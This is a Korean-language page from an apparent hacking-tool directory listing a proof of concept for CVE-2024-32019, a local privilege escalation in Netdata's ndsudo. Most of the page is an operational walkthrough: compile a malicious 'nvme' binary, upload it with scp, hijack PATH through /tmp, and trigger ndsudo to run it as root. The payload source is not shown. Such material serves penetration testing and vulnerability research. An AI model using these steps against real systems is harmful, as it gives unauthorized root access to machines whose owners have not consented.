Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/azureadtrent/cve-2024-32019-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubazureadtrent/cve-2024-32019-poc

CVE-2024-32019-POC

netdata ndsudo 취약점에 대한 POC - CVE-2024-32019

저장소 보기
2121년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ndsudo를 통한 권한 상승 (Netdata 로컬 익스플로잇)

이 POC는 Netdata에 포함된 취약한 ndsudo 유틸리티를 악용하여 로컬 권한을 root로 상승시키는 데 사용됩니다. 이 익스플로잇은 사용자의 PATH에 신뢰되는 명령어(nvme)를 사칭하는 악성 바이너리를 주입하여 ndsudo가 root 권한으로 실행하도록 합니다.


선행 조건 및 가정

  • 대상 시스템에 로컬 셸 접근이 가능해야 합니다.

  • 다음 명령어를 실행할 수 있지만 "not found" 또는 유사한 오류가 발생합니다:

    root@kitploit:~
    ./ndsudo nvme-list
    

1. 악성 페이로드 컴파일

공격자 시스템(또는 컴파일러가 있는 취약 시스템)에서 바이너리를 컴파일합니다 (예: 저장소의 poc.c 파일로부터):

root@kitploit:~
gcc poc.c -o nvme

이 바이너리는 root 셸을 생성하거나 root 권한으로 임의의 명령어를 실행하도록 제작되어야 합니다.


2. 대상 시스템으로 페이로드 전송

컴파일된 nvme 바이너리를 사용자가 쓰기 가능한 디렉토리(예: /tmp)로 이동하거나 업로드합니다:

root@kitploit:~
scp nvme user@target:/tmp/
# 또는 사용 가능한 파일 업로드 방법 사용

3. 실행을 위한 페이로드 준비

대상 시스템에서 바이너리가 실행 가능하도록 설정하고, 그 디렉토리를 PATH 앞에 추가합니다:

root@kitploit:~
chmod +x /tmp/nvme
export PATH=/tmp:$PATH

이렇게 하면 ndsudo가 정상적인 nvme 대신 악성 nvme를 찾아 실행합니다.


4. ndsudo가 페이로드를 실행하도록 트리거

취약한 명령어를 실행하여 ndsudo를 트리거합니다:

root@kitploit:~
./ndsudo nvme-list

리소스

  • Netdata GitHub 보안 권고: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
도구 다운로드